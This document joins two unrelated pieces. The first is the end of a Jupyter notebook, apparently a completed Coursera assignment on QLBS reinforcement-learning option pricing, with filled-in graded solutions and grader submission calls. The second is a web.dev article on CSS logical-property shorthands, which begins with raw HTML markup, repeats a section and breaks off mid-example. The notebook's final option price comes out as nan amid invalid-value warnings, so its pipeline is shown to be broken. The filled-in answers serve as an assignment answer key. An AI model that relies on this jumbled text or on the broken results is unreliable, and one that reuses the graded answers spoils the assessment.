Psi_2_aux = np.expand_dims(Psi_mat, axis=0)
print(Psi_1_aux.shape, Psi_2_aux.shape)

S_t_mat = np.sum(np.multiply(Psi_1_aux, Psi_2_aux), axis=2)
print(S_t_mat.shape)
```

    (36, 1, 10000, 7) (1, 36, 10000, 7)
    (36, 36, 7)

```python
# clean up some space
del Psi_1_aux, Psi_2_aux, data_mat_swap_idx, A_2
```
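As a readability cross-check (my addition, not in the original post), the same $$\mathbf S_t$$ tensor can be written as a single einsum:

```python
# Sketch: S_t_mat[n, m, t] = sum_k Psi_mat[n, k, t] * Psi_mat[m, k, t]
S_t_mat_check = np.einsum('nkt,mkt->nmt', Psi_mat, Psi_mat)
print(np.allclose(S_t_mat, S_t_mat_check))  # expected: True
```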
## Part 4: Calculate the $$\mathbf S_t$$ matrix and $$\mathbf M_t$$ vector

The vector $$\vec W_t$$ can be solved by

$$\vec W_t=\mathbf S_t^{-1}\mathbf M_t$$

where $$\mathbf S_t$$ and $$\mathbf M_t$$ are a matrix and a vector, respectively, with elements given by

$$S_{nm}^{\left(t\right)}=\sum_{k=1}^{N_{MC}}{\Psi_n\left(X_t^k,a_t^k\right)\Psi_m\left(X_t^k,a_t^k\right)}\quad\quad M_n^{\left(t\right)}=\sum_{k=1}^{N_{MC}}{\Psi_n\left(X_t^k,a_t^k\right)\left(R_t\left(X_t,a_t,X_{t+1}\right)+\gamma\max_{a_{t+1}\in\mathcal{A}}Q_{t+1}^\star\left(X_{t+1},a_{t+1}\right)\right)}$$

Define functions *function_S* and *function_M* to compute the values of the matrix $$\mathbf S_t$$ and the vector $$\mathbf M_t$$.

**Instructions:**

- implement function_S_vec(), which computes the $$S_{nm}^{\left(t\right)}$$ matrix
- implement function_M_vec(), which computes the $$M_n^{\left(t\right)}$$ column vector

```python
# vectorized functions

def function_S_vec(t, S_t_mat, reg_param):
    """
    function_S_vec - calculate the S_{nm} matrix from Eq. (75) (with a regularization!)
    Eq. (75) in QLBS Q-Learner in the Black-Scholes-Merton article
    num_Qbasis = 3 x num_basis, 3 because of the basis expansion (1, a_t, 0.5 a_t^2)

    Arguments:
    t - time index, a scalar, an index into time axis of S_t_mat
    S_t_mat - pandas.DataFrame of dimension num_Qbasis x num_Qbasis x T
    reg_param - regularization parameter, a scalar

    Return:
    S_mat_reg - num_Qbasis x num_Qbasis
    """
    ### START CODE HERE ### (≈ 4-5 lines of code)
    num_Qbasis = S_t_mat.shape[0]
    S_mat_reg = S_t_mat[:,:,t] + reg_param * np.eye(num_Qbasis)
    ### END CODE HERE ###
    return S_mat_reg


def function_M_vec(t, Q_star, R, Psi_mat_t, gamma=gamma):
    """
    function_M_vec - calculate the M_{n} vector from Eq. (75) (with a regularization!)
    Eq. (75) in QLBS Q-Learner in the Black-Scholes-Merton article
    num_Qbasis = 3 x num_basis, 3 because of the basis expansion (1, a_t, 0.5 a_t^2)

    Arguments:
    t - time index, a scalar, an index into time axis of S_t_mat
    Q_star - pandas.DataFrame of Q-function values of dimension N_MC x T
    R - pandas.DataFrame of rewards of dimension N_MC x T
    Psi_mat_t - pandas.DataFrame of dimension num_Qbasis x N_MC
    gamma - one time-step discount factor $exp(-r \delta t)$

    Return:
    M_t - np.array of dimension num_Qbasis x 1
    """
    ### START CODE HERE ### (≈ 2-3 lines of code)
    M_t = np.dot(Psi_mat_t, R.loc[:,t] + gamma * Q_star.loc[:, t+1])
    ### END CODE HERE ###
    return M_t
```

```python
### GRADED PART (DO NOT EDIT) ###
reg_param = 1e-3
np.random.seed(42)

S_mat_reg = function_S_vec(T-1, S_t_mat, reg_param)
idx_row = np.random.randint(low=0, high=S_mat_reg.shape[0], size=10)
np.random.seed(42)
idx_col = np.random.randint(low=0, high=S_mat_reg.shape[1], size=10)

part_3 = list(S_mat_reg[idx_row, idx_col].flatten())
try:
    part3 = " ".join(map(repr, part_3))
except TypeError:
    part3 = repr(part_3)
submissions[all_parts[2]] = part3
grading.submit(COURSERA_EMAIL, COURSERA_TOKEN, assignment_key, all_parts[:3], all_parts, submissions)
S_mat_reg[idx_row, idx_col].flatten()
### GRADED PART (DO NOT EDIT) ###
```

    Submission successful, please check on the coursera grader page for the status

    array([  2.22709265e-01,  2.68165972e+02,  4.46911166e+01,  2.00678517e+00,
             1.10020457e+03,  8.44758984e-01,  2.29671816e+02,  2.29671816e+02,
             3.78571544e-03,  1.41884196e-02])

```python
### GRADED PART (DO NOT EDIT) ###
Q_RL = pd.DataFrame([], index=range(1, N_MC+1), columns=range(T+1))
Q_RL.iloc[:,-1] = - Pi.iloc[:,-1] - risk_lambda * np.var(Pi.iloc[:,-1])

Q_star = pd.DataFrame([], index=range(1, N_MC+1), columns=range(T+1))
Q_star.iloc[:,-1] = Q_RL.iloc[:,-1]

M_t = function_M_vec(T-1, Q_star, R, Psi_mat[:,:,T-1], gamma)
part_4 = list(M_t)
try:
    part4 = " ".join(map(repr, part_4))
except TypeError:
    part4 = repr(part_4)
submissions[all_parts[3]] = part4
grading.submit(COURSERA_EMAIL, COURSERA_TOKEN, assignment_key, all_parts[:4], all_parts, submissions)
M_t
### GRADED PART (DO NOT EDIT) ###
```

    Submission successful, please check on the coursera grader page for the status

    array([ -6.03245979e+01, -8.79998437e+01, -2.37497369e+02, -5.62543448e+02,
             2.09052583e+02, -6.44961368e+02, -2.86243249e+03,  2.77687723e+03,
            -1.85728309e+03, -9.40505558e+03,  9.50610806e+03, -5.29328413e+03,
            -1.69800964e+04,  1.61026240e+04, -8.42698927e+03, -8.46211901e+03,
             6.05144701e+03, -2.62196067e+03, -2.12066484e+03,  8.42176836e+02,
            -2.51624368e+02, -3.01116012e+02,  2.57124667e+01, -3.22639691e+00,
            -5.53769815e+01,  1.67390280e+00, -6.79562288e-02, -1.61140947e+01,
             1.16524075e+00, -1.49934348e-01, -9.79117274e+00, -7.22309330e-02,
            -4.70108927e-01, -6.87393130e+00, -2.10244341e+00, -7.70293521e-01])
Call *function_S* and *function_M* for $$t=T-1,...,0$$ together with the vector $$\vec\Psi\left(X_t,a_t\right)$$ to compute $$\vec W_t$$ and learn the Q-function $$Q_t^\star\left(X_t,a_t\right)=\mathbf A_t^T\mathbf U_W\left(t,X_t\right)$$ implied by the input data backward recursively with terminal condition $$Q_T^\star\left(X_T,a_T=0\right)=-\Pi_T\left(X_T\right)-\lambda Var\left[\Pi_T\left(X_T\right)\right]$$.

When the vector $$\vec{W}_t$$ is computed as per the above at time $$t$$, we can convert it back to the matrix $$\mathbf{W}_t$$ by reshaping to the shape $$3\times M$$.

We can then calculate the matrix $$\mathbf U_t$$ at time $$t$$ for the whole set of MC paths as follows (this is Eq. (65) from the paper, in matrix form):

$$\mathbf U_{W}\left(t,X_t\right)=\left[\begin{matrix}\mathbf U_W^{0,k}\left(t,X_t\right)\\ \mathbf U_W^{1,k}\left(t,X_t\right)\\ \mathbf U_W^{2,k}\left(t,X_t\right)\end{matrix}\right]=\mathbf{W}_t\Phi_t\left(t,X_t\right)$$

Here the matrix $$\mathbf\Phi_t$$ has shape $$M\times N_{MC}$$, so their dot product has dimension $$3\times N_{MC}$$, as it should. Once this matrix $$\mathbf U_t$$ is computed, the individual vectors $$\mathbf U_W^{0},\mathbf U_W^{1},\mathbf U_W^{2}$$ for all MC paths are read off as rows of this matrix.

From here, we can compute the optimal action and the optimal Q-function $$Q^\star\left(X_t,a_t^\star\right)$$ at the optimal action for a given step $$t$$. This will be used to evaluate $$\max_{a_{t+1}\in\mathcal{A}}Q^\star\left(X_{t+1},a_{t+1}\right)$$.

The optimal action and the optimal Q-function at the optimal action can be computed as

$$a_t^\star\left(X_t\right)=\frac{\mathbb{E}_{t}\left[\Delta\hat{S}_{t}\hat{\Pi}_{t+1}+\frac{1}{2\gamma\lambda}\Delta S_{t}\right]}{\mathbb{E}_{t}\left[\left(\Delta\hat{S}_{t}\right)^2\right]}\,,\quad\quad Q_t^\star\left(X_t,a_t^\star\right)=\mathbf U_W^{\left(0\right)}\left(t,X_t\right)+a_t^\star\,\mathbf U_W^{\left(1\right)}\left(t,X_t\right)+\frac{1}{2}\left(a_t^\star\right)^2\mathbf U_W^{\left(2\right)}\left(t,X_t\right)$$

with terminal condition $$a_T^\star=0$$ and $$Q_T^\star\left(X_T,a_T^\star=0\right)=-\Pi_T\left(X_T\right)-\lambda Var\left[\Pi_T\left(X_T\right)\right]$$.

Plots of optimal action $$a_t^\star\left(X_t\right)$$, optimal Q-function with optimal action $$Q_t^\star\left(X_t,a_t^\star\right)$$ and implied Q-function $$Q_t^\star\left(X_t,a_t\right)$$ paths are shown below.
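A small aside (my addition, not used by the loop below, which deliberately reuses the DP hedges instead): because Q is quadratic in the action, its analytic maximizer is available in closed form. For $$Q\left(a\right)=U_W^{\left(0\right)}+a\,U_W^{\left(1\right)}+\frac{1}{2}a^2U_W^{\left(2\right)}$$ the stationary point is $$a^\star=-U_W^{\left(1\right)}/U_W^{\left(2\right)}$$, a maximum whenever $$U_W^{\left(2\right)}<0$$:

```python
# Sketch: closed-form argmax of a quadratic Q in the action,
# with hypothetical coefficients chosen only for illustration.
U_W_0, U_W_1, U_W_2 = 1.0, 0.6, -2.0            # hypothetical values
a_star_analytic = - U_W_1 / U_W_2               # = 0.3; a maximum since U_W_2 < 0
q_max = U_W_0 + a_star_analytic * U_W_1 + 0.5 * a_star_analytic**2 * U_W_2
print(a_star_analytic, q_max)                   # 0.3 1.09
```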
## Fitted Q Iteration (FQI)

```python
starttime = time.time()

# implied Q-function by input data (using the first form in Eq. (68))
Q_RL = pd.DataFrame([], index=range(1, N_MC+1), columns=range(T+1))
Q_RL.iloc[:,-1] = - Pi.iloc[:,-1] - risk_lambda * np.var(Pi.iloc[:,-1])

# optimal action
a_opt = np.zeros((N_MC, T+1))
a_star = pd.DataFrame([], index=range(1, N_MC+1), columns=range(T+1))
a_star.iloc[:,-1] = 0

# optimal Q-function with optimal action
Q_star = pd.DataFrame([], index=range(1, N_MC+1), columns=range(T+1))
Q_star.iloc[:,-1] = Q_RL.iloc[:,-1]

# max_Q_star_next = Q_star.iloc[:,-1].values
max_Q_star = np.zeros((N_MC, T+1))
max_Q_star[:,-1] = Q_RL.iloc[:,-1].values

num_basis = data_mat_t.shape[2]

reg_param = 1e-3
hyper_param = 1e-1

# The backward loop
for t in range(T-1, -1, -1):
    # calculate the vector W_t
    S_mat_reg = function_S_vec(t, S_t_mat, reg_param)
    M_t = function_M_vec(t, Q_star, R, Psi_mat[:,:,t], gamma)
    W_t = np.dot(np.linalg.inv(S_mat_reg), M_t)  # this is a 1D array of dimension 3M

    # reshape to a matrix W_mat
    W_mat = W_t.reshape((3, num_basis), order='F')  # shape 3 x M

    # make matrix Phi_mat
    Phi_mat = data_mat_t[t,:,:].T  # dimension M x N_MC

    # compute matrix U_mat of dimension 3 x N_MC
    U_mat = np.dot(W_mat, Phi_mat)

    # compute vectors U_W^0, U_W^1, U_W^2 as rows of matrix U_mat
    U_W_0 = U_mat[0,:]
    U_W_1 = U_mat[1,:]
    U_W_2 = U_mat[2,:]

    # IMPORTANT!!! Instead, use hedges computed as in the DP approach:
    # in this way, errors of function approximation do not back-propagate.
    # This provides a stable solution, unlike the first method, which
    # leads to a diverging solution.
    A_mat = function_A_vec(t, delta_S_hat, data_mat_t, reg_param)
    B_vec = function_B_vec(t, Pi_hat, delta_S_hat, S, data_mat_t)
    # print('t =', t, 'A_mat.shape =', A_mat.shape, 'B_vec.shape =', B_vec.shape)
    phi = np.dot(np.linalg.inv(A_mat), B_vec)

    a_opt[:,t] = np.dot(data_mat_t[t,:,:], phi)
    a_star.loc[:,t] = a_opt[:,t]

    max_Q_star[:,t] = U_W_0 + a_opt[:,t] * U_W_1 + 0.5 * (a_opt[:,t]**2) * U_W_2

    # update dataframes
    Q_star.loc[:,t] = max_Q_star[:,t]

    # update the Q_RL solution given by a dot product of the two matrices W_t and Psi_t
    Psi_t = Psi_mat[:,:,t].T  # dimension N_MC x 3M
    Q_RL.loc[:,t] = np.dot(Psi_t, W_t)

    # trim outliers for Q_RL
    up_percentile_Q_RL = 95
    low_percentile_Q_RL = 5
    low_perc_Q_RL, up_perc_Q_RL = np.percentile(Q_RL.loc[:,t], [low_percentile_Q_RL, up_percentile_Q_RL])
    # print('t = %s low_perc_Q_RL = %s up_perc_Q_RL = %s' % (t, low_perc_Q_RL, up_perc_Q_RL))

    # trim outliers in values of max_Q_star:
    flag_lower = Q_RL.loc[:,t].values < low_perc_Q_RL
    flag_upper = Q_RL.loc[:,t].values > up_perc_Q_RL
    Q_RL.loc[flag_lower,t] = low_perc_Q_RL
    Q_RL.loc[flag_upper,t] = up_perc_Q_RL

endtime = time.time()
print('\nTime Cost:', endtime - starttime, 'seconds')
```

    /opt/conda/lib/python3.6/site-packages/ipykernel_launcher.py:21: FutureWarning: reshape is deprecated and will raise in a subsequent release. Please use .values.reshape(...) instead
    /opt/conda/lib/python3.6/site-packages/numpy/lib/function_base.py:4116: RuntimeWarning: Invalid value encountered in percentile
      interpolation=interpolation)
    /opt/conda/lib/python3.6/site-packages/ipykernel_launcher.py:77: RuntimeWarning: invalid value encountered in less
    /opt/conda/lib/python3.6/site-packages/ipykernel_launcher.py:78: RuntimeWarning: invalid value encountered in greater

    Time Cost: 4.891070604324341 seconds

```python
# plot both simulations
f, axarr = plt.subplots(3, 1)
f.subplots_adjust(hspace=.5)
f.set_figheight(8.0)
f.set_figwidth(8.0)

step_size = N_MC // 10
idx_plot = np.arange(step_size, N_MC, step_size)

axarr[0].plot(a_star.T.iloc[:, idx_plot])
axarr[0].set_xlabel('Time Steps')
axarr[0].set_title(r'Optimal action $a_t^{\star}$')

axarr[1].plot(Q_RL.T.iloc[:, idx_plot])
axarr[1].set_xlabel('Time Steps')
axarr[1].set_title(r'Q-function $Q_t^{\star} (X_t, a_t)$')

axarr[2].plot(Q_star.T.iloc[:, idx_plot])
axarr[2].set_xlabel('Time Steps')
axarr[2].set_title(r'Optimal Q-function $Q_t^{\star} (X_t, a_t^{\star})$')

plt.savefig('QLBS_FQI_off_policy_summary_ATM_eta_%d.png' % (100 * eta), dpi=600)
plt.show()
```

![png](/assets/img/rlhedge/unit3/output_59_0.png)

Compare the optimal action $$a_t^\star\left(X_t\right)$$ and the optimal Q-function with optimal action $$Q_t^\star\left(X_t,a_t^\star\right)$$ given by Dynamic Programming and Reinforcement Learning. A one-path comparison is plotted below.

```python
# plot a and a_star
# plot 1 path
num_path = 120  # 240 # 260 # 300 # 430 # 510

# Note that a from the DP method and a_star from the RL method are now identical by construction
plt.plot(a.T.iloc[:,num_path], label="DP Action")
plt.plot(a_star.T.iloc[:,num_path], label="RL Action")
plt.legend()
plt.xlabel('Time Steps')
plt.title('Optimal Action Comparison Between DP and RL')
plt.show()
```

![png](/assets/img/rlhedge/unit3/output_61_0.png)

## Summary of the RL-based pricing with QLBS

```python
# QLBS option price
C_QLBS = - Q_star.copy()  # Q_RL #

print('---------------------------------')
print('       QLBS RL Option Pricing       ')
print('---------------------------------\n')
print('%-25s' % ('Initial Stock Price:'), S0)
print('%-25s' % ('Drift of Stock:'), mu)
print('%-25s' % ('Volatility of Stock:'), sigma)
print('%-25s' % ('Risk-free Rate:'), r)
print('%-25s' % ('Risk aversion parameter :'), risk_lambda)
print('%-25s' % ('Strike:'), K)
print('%-25s' % ('Maturity:'), M)
print('%-26s %.4f' % ('\nThe QLBS Put Price 1 :', (np.mean(C_QLBS.iloc[:,0]))))
print('%-26s %.4f' % ('\nBlack-Scholes Put Price:', bs_put(0)))
print('\n')

# # plot one path
# plt.plot(C_QLBS.T.iloc[:,[200]])
# plt.xlabel('Time Steps')
# plt.title('QLBS RL Option Price')
# plt.show()
```

    ---------------------------------
           QLBS RL Option Pricing
    ---------------------------------

    Initial Stock Price:      100
    Drift of Stock:           0.05
    Volatility of Stock:      0.15
    Risk-free Rate:           0.03
    Risk aversion parameter : 0.001
    Strike:                   100
    Maturity:                 1

    The QLBS Put Price 1 :     nan

    Black-Scholes Put Price:   4.5296

```python
### GRADED PART (DO NOT EDIT) ###
part5 = str(C_QLBS.iloc[0,0])
submissions[all_parts[4]] = part5
grading.submit(COURSERA_EMAIL, COURSERA_TOKEN, assignment_key, all_parts[:5], all_parts, submissions)
C_QLBS.iloc[0,0]
### GRADED PART (DO NOT EDIT) ###
```

    Submission successful, please check on the coursera grader page for the status

    nan
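The `nan` price above indicates that invalid values crept into the FQI backward recursion, consistent with the RuntimeWarnings emitted by the loop. A quick diagnostic sketch (my addition, not in the original notebook) to locate them:

```python
# Sketch: locate the NaNs behind the 'nan' QLBS price printed above.
print('NaNs in Q_star:', Q_star.isnull().values.any())
print('NaNs in Q_RL  :', Q_RL.isnull().values.any())
print('fraction of NaN prices at t=0:', C_QLBS.iloc[:, 0].isnull().mean())
```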
```python
# add here calculation of different MC runs (repetitions of the action randomization)

# on-policy values
y1_onp = 5.0211  # 4.9170
y2_onp = 4.7798  # 7.6500
# QLBS_price_on_policy = 4.9004 +/- 0.1206

# these are the results for noise eta = 0.15
# p1 = np.array([5.0174, 4.9249, 4.9191, 4.9039, 4.9705, 4.6216])
# p2 = np.array([6.3254, 8.6733, 8.0686, 7.5355, 7.1751, 7.1959])
p1 = np.array([5.0485, 5.0382, 5.0211, 5.0532, 5.0184])
p2 = np.array([4.7778, 4.7853, 4.7781, 4.7805, 4.7828])

# results for eta = 0.25
# p3 = np.array([4.9339, 4.9243, 4.9224, 5.1643, 5.0449, 4.9176])
# p4 = np.array([7.7696, 8.1922, 7.5440, 7.2285, 5.6306, 12.6072])
p3 = np.array([5.0147, 5.0445, 5.1047, 5.0644, 5.0524])
p4 = np.array([4.7842, 4.7873, 4.7847, 4.7792, 4.7796])

# results for eta = 0.35
# p7 = np.array([4.9718, 4.9528, 5.0170, 4.7138, 4.9212, 4.6058])
# p8 = np.array([8.2860, 7.4012, 7.2492, 8.9926, 6.2443, 6.7755])
p7 = np.array([5.1342, 5.2288, 5.0905, 5.0784, 5.0013])
p8 = np.array([4.7762, 4.7813, 4.7789, 4.7811, 4.7801])

# results for eta = 0.5
# p5 = np.array([4.9446, 4.9894, 6.7388, 4.7938, 6.1590, 4.5935])
# p6 = np.array([7.5632, 7.9250, 6.3491, 7.3830, 13.7668, 14.6367])
p5 = np.array([3.1459, 4.9673, 4.9348, 5.2998, 5.0636])
p6 = np.array([4.7816, 4.7814, 4.7834, 4.7735, 4.7768])

# print(np.mean(p1), np.mean(p3), np.mean(p5))
# print(np.mean(p2), np.mean(p4), np.mean(p6))
# print(np.std(p1), np.std(p3), np.std(p5))
# print(np.std(p2), np.std(p4), np.std(p6))

x = np.array([0.15, 0.25, 0.35, 0.5])
y1 = np.array([np.mean(p1), np.mean(p3), np.mean(p7), np.mean(p5)])
y2 = np.array([np.mean(p2), np.mean(p4), np.mean(p8), np.mean(p6)])
y_err_1 = np.array([np.std(p1), np.std(p3), np.std(p7), np.std(p5)])
y_err_2 = np.array([np.std(p2), np.std(p4), np.std(p8), np.std(p6)])

# plot it
f, axs = plt.subplots(nrows=2, ncols=2, sharex=True)
f.subplots_adjust(hspace=.5)
f.set_figheight(6.0)
f.set_figwidth(8.0)

ax = axs[0,0]
ax.plot(x, y1)
ax.axhline(y=y1_onp, linewidth=2, color='r')
textstr = 'On-policy value = %2.2f' % (y1_onp)
props = dict(boxstyle='round', facecolor='wheat', alpha=0.5)
# place a text box in upper left in axes coords
ax.text(0.05, 0.15, textstr, fontsize=11, transform=ax.transAxes, verticalalignment='top', bbox=props)
ax.set_title('Mean option price')
ax.set_xlabel('Noise level')

ax = axs[0,1]
ax.plot(x, y2)
ax.axhline(y=y2_onp, linewidth=2, color='r')
textstr = 'On-policy value = %2.2f' % (y2_onp)
props = dict(boxstyle='round', facecolor='wheat', alpha=0.5)
# place a text box in upper left in axes coords
ax.text(0.35, 0.95, textstr, fontsize=11, transform=ax.transAxes, verticalalignment='top', bbox=props)
ax.set_title('Mean option price')
ax.set_xlabel('Noise level')

ax = axs[1,0]
ax.plot(x, y_err_1)
ax.set_title('Std of option price')
ax.set_xlabel('Noise level')

ax = axs[1,1]
ax.plot(x, y_err_2)
ax.set_title('Std of option price')
ax.set_xlabel('Noise level')

f.suptitle('Mean and std of option price vs noise level')
plt.savefig('Option_price_vs_noise_level.png', dpi=600)
plt.show()
```

![png](/assets/img/rlhedge/unit3/output_65_0.png)

---
href="/" class="w-breadcrumbs__link w-breadcrumbs__link--left-justify gc-analytics-event">Home</a> - <a href="/blog" class="w-breadcrumbs__link gc-analytics-event">All articles</a> # Logical layout enhancements with flow-relative shorthands New logical property shorthands and new inset properties for Chromium. Oct 13, 2020 [<img src="https://web-dev.imgix.net/image/admin/jdQIxAJrGuFOtwmuDfIn.jpg?auto=format&amp;fit=crop&amp;h=64&amp;w=64" alt="Adam Argyle" class="w-author__image" sizes="(min-width: 64px) 64px, calc(100vw - 48px)" srcset="https://web-dev.imgix.net/image/admin/jdQIxAJrGuFOtwmuDfIn.jpg?fit=crop&amp;h=64&amp;w=64&amp;auto=format&amp;dpr=1&amp;q=75 1x, https://web-dev.imgix.net/image/admin/jdQIxAJrGuFOtwmuDfIn.jpg?fit=crop&amp;h=64&amp;w=64&amp;auto=format&amp;dpr=2&amp;q=50 2x, https://web-dev.imgix.net/image/admin/jdQIxAJrGuFOtwmuDfIn.jpg?fit=crop&amp;h=64&amp;w=64&amp;auto=format&amp;dpr=3&amp;q=35 3x, https://web-dev.imgix.net/image/admin/jdQIxAJrGuFOtwmuDfIn.jpg?fit=crop&amp;h=64&amp;w=64&amp;auto=format&amp;dpr=4&amp;q=23 4x, https://web-dev.imgix.net/image/admin/jdQIxAJrGuFOtwmuDfIn.jpg?fit=crop&amp;h=64&amp;w=64&amp;auto=format&amp;dpr=5&amp;q=20 5x" width="64" height="64" />](/authors/adamargyle/) <a href="/authors/adamargyle/" class="w-author__name-link">Adam Argyle</a> - <a href="https://twitter.com/argyleink" class="w-author__link">Twitter</a> - <a href="https://github.com/argyleink" class="w-author__link">GitHub</a> - <a href="https://glitch.com/@argyleink" class="w-author__link">Glitch</a> - <a href="https://nerdy.dev" class="w-author__link">Blog</a> [<img src="https://web-dev.imgix.net/image/admin/uedrGuXN8MZ0tg11zsmK.jpg?auto=format&amp;fit=crop&amp;h=64&amp;w=64" alt="Oriol Brufau" class="w-author__image" sizes="(min-width: 64px) 64px, calc(100vw - 48px)" srcset="https://web-dev.imgix.net/image/admin/uedrGuXN8MZ0tg11zsmK.jpg?fit=crop&amp;h=64&amp;w=64&amp;auto=format&amp;dpr=1&amp;q=75 1x, https://web-dev.imgix.net/image/admin/uedrGuXN8MZ0tg11zsmK.jpg?fit=crop&amp;h=64&amp;w=64&amp;auto=format&amp;dpr=2&amp;q=50 2x, https://web-dev.imgix.net/image/admin/uedrGuXN8MZ0tg11zsmK.jpg?fit=crop&amp;h=64&amp;w=64&amp;auto=format&amp;dpr=3&amp;q=35 3x, https://web-dev.imgix.net/image/admin/uedrGuXN8MZ0tg11zsmK.jpg?fit=crop&amp;h=64&amp;w=64&amp;auto=format&amp;dpr=4&amp;q=23 4x, https://web-dev.imgix.net/image/admin/uedrGuXN8MZ0tg11zsmK.jpg?fit=crop&amp;h=64&amp;w=64&amp;auto=format&amp;dpr=5&amp;q=20 5x" width="64" height="64" />](/authors/loirooriol/) <a href="/authors/loirooriol/" class="w-author__name-link">Oriol Brufau</a> - <a href="https://github.com/Loirooriol" class="w-author__link">GitHub</a> Since Chromium 69 (September 3rd 2018), [logical properties](https://developer.mozilla.org/en-US/docs/Web/CSS/CSS_Logical_Properties) and values have helped developers maintain control of their international layouts through logical, rather than physical, direction and dimension styles. In Chromium 87, shorthands and offsets have shipped to make these logical properties and values a bit easier to write. This catches Chromium up to Firefox, which has had support for the shorthands [since 66](https://developer.mozilla.org/en-US/docs/Mozilla/Firefox/Releases/66). Safari has them ready in their [tech preview](https://webkit.org/blog/11300/release-notes-for-safari-technology-preview-114/). 
## Document flow

![Figure](https://web-dev.imgix.net/image/tcFciHGuF3MxnTr1y5ue01OGLBn2/t2y5tF9s3Wcp50kJJMmm.png)

If you're already familiar with logical properties, inline and block axes, and don't want a refresher, you can [skip ahead](#new-shorthands). Otherwise, here's a short refresher.

In English, letters and words flow left to right while paragraphs are stacked top to bottom. In traditional Chinese, letters and words are top to bottom while paragraphs are stacked right to left. In just these 2 cases, if we write CSS that puts "margin top" on a paragraph, we're only appropriately spacing 1 language style. If the page is translated into traditional Chinese from English, the margin may well not make sense in the new vertical writing mode.

Therefore the physical side of the box isn't very useful internationally. Thus begins the process of supporting multiple languages: learning about physical versus logical sides of the box model.

**Key Term**: A _logical property_ is one that references a side, corner or axis of the box model in context of the applicable language direction. It's akin to referencing someone's `strong` arm, rather than assuming it's their `right` arm. "Right" is a physical arm reference, "strong" is a logical arm reference, **contextual to the individual**.

Have you ever inspected the `p` element in Chrome DevTools?
If so, you might have noticed that the [default User Agent styles](https://html.spec.whatwg.org/multipage/rendering.html#flow-content-3:~:text=blockquote%2C%20figure%2C%20listing%2C%20p%2C%20plaintext%2C%20pre%2C,%7D) are not physical, but logical:

```css
p {
  margin-block-start: 1em;
  margin-block-end: 1em;
  margin-inline-start: 0px;
  margin-inline-end: 0px;
}
```

CSS from [Chromium's User Agent Stylesheet](https://chromium.googlesource.com/chromium/blink/+/master/Source/core/css/html.css)

The margin is not on the top or bottom like an English reader might believe. It's `block-start` and `block-end`! These logical properties are akin to an English reader's top and bottom, but **also** akin to a Japanese reader's right and left. Written once, works everywhere.

Normal flow is when the webpage is part of this multi-directionality intentionally. When page content updates according to document direction changes, the layout and its elements are considered in flow. Read more about "in" and "out" of flow [on MDN](https://developer.mozilla.org/en-US/docs/Web/CSS/CSS_Flow_Layout) or in the [CSS Display Module spec](https://drafts.csswg.org/css-display-3/#out-of-flow). While logical properties are not required to be in flow, they do much of the heavy lifting for you as directionality changes. Flow implies direction, which letters, words and content need to travel along. This leads us to block and inline logical directions.

Block direction is the direction that new content blocks follow, like asking yourself, "where to put the next paragraph?". You might think of it as a "content block", or "block of text". Every language arranges its blocks and orders them along its respective `block-axis`. `block-start` is the side where a paragraph is first placed, while `block-end` is the side new paragraphs flow towards.

**Key Term**: The _block direction_ is defined by the `writing-mode` property. For example, `horizontal-tb` (the initial value) has a vertical block axis that flows top-to-bottom (`tb`). Other values have a horizontal block axis, which can flow left-to-right (as in `vertical-lr`) or right-to-left (as in `vertical-rl`).

In traditional Japanese handwriting, for example, the block direction flows right to left.

Inline direction is the direction that letters and words go. Consider the direction your arm and hand travel when you write; they are traveling along the `inline-axis`. `inline-start` is the side where you start writing, while `inline-end` is the side where writing ends or wraps. In traditional Japanese handwriting, the `inline-axis` runs top to bottom, while in a right-to-left script it flows right to left.

**Key Term**: The _inline direction_ is defined by both `writing-mode` and `direction`. For example, it flows left-to-right with `horizontal-tb` and `ltr`, right-to-left with `horizontal-tb` and `rtl`, top-to-bottom with `vertical-lr` and `ltr`, and bottom-to-top with `vertical-rl` and `rtl`.

Being [`flow-relative`](https://www.w3.org/TR/css-writing-modes-4/#logical-directions) means that styles written for one language will be contextual and appropriately applied to other languages. Content will flow relative to the language it's being delivered for.

## New shorthands

Some of the following shorthands are not new features for the browser; rather, they are easier ways to write styles, taking advantage of being able to set values on both block or inline edges at once.
## New shorthands

Some of the following shorthands are not new features for the browser; rather, they are easier ways to write styles by taking advantage of being able to set values on both block or inline edges at once. The `inset-*` logical properties **do** bring new abilities, as there were no longhand ways to specify absolute positions with logical properties before them. Insets and shorthands flow (hehe) together so well though, I'm going to tell you about all of the new logical properties features landing in Chromium 87 at once.

### Margin shorthands

No new abilities shipped, but some super handy shorthands did: [`margin-block`](https://developer.mozilla.org/en-US/docs/Web/CSS/margin-block) and [`margin-inline`](https://developer.mozilla.org/en-US/docs/Web/CSS/margin-inline).

Longhand:

```css
margin-block-start: 2ch;
margin-block-end: 2ch;
```

New shorthand:

```css
margin-block: 2ch;
/* or */
margin-block: 2ch 2ch;
```

There is no shorthand for "top and bottom" or "left and right"… until now! You probably reference all 4 sides using the shorthand of `margin: 10px;`, and now you can easily reference 2 complementary sides by using the logical property shorthand.

Longhand:

```css
margin-inline-start: 4ch;
margin-inline-end: 2ch;
```

New shorthand:

```css
margin-inline: 4ch 2ch;
```

### Padding shorthands

No new abilities shipped, but more super handy shorthands did: [`padding-block`](https://developer.mozilla.org/en-US/docs/Web/CSS/padding-block) and [`padding-inline`](https://developer.mozilla.org/en-US/docs/Web/CSS/padding-inline).

Longhand:

```css
padding-block-start: 2ch;
padding-block-end: 2ch;
```

New shorthand:

```css
padding-block: 2ch;
/* or */
padding-block: 2ch 2ch;
```

And the `inline` complementary set of shorthands:

Longhand:

```css
padding-inline-start: 4ch;
padding-inline-end: 2ch;
```

New shorthand:

```css
padding-inline: 4ch 2ch;
```

### Inset and shorthands

The physical properties `top`, `right`, `bottom` and `left` can all be written as values for the `inset` property. Any value of `position` can benefit from setting sides with inset.

```css
.cover {
  position: absolute;
  /* the four physical longhands below collapse into one declaration */
  /* top: 0; right: 0; bottom: 0; left: 0; */
  inset: 0;
}
```

Physical longhand:

```css
position: absolute;
top: 1px;
right: 2px;
bottom: 3px;
left: 4px;
```

New physical shorthand:

```css
position: absolute;
inset: 1px 2px 3px 4px;
```

That should look immediately convenient! Inset is shorthand for the physical sides, and it works just like margin and padding.

#### New features

As exciting as the physical sides shorthand is, there's even more from the logical features brought by additional `inset` shorthands. These shorthands bring developer authoring convenience (they're shorter to type) but also increase the potential reach for the layout because they're flow-relative.

Physical longhand:

```css
position: absolute;
top: 10px;
bottom: 10px;
```

Logical shorthand:

```css
position: absolute;
inset-block: 10px;
```

Physical longhand:

```css
position: absolute;
left: 10px;
right: 20px;
```

Logical shorthand:

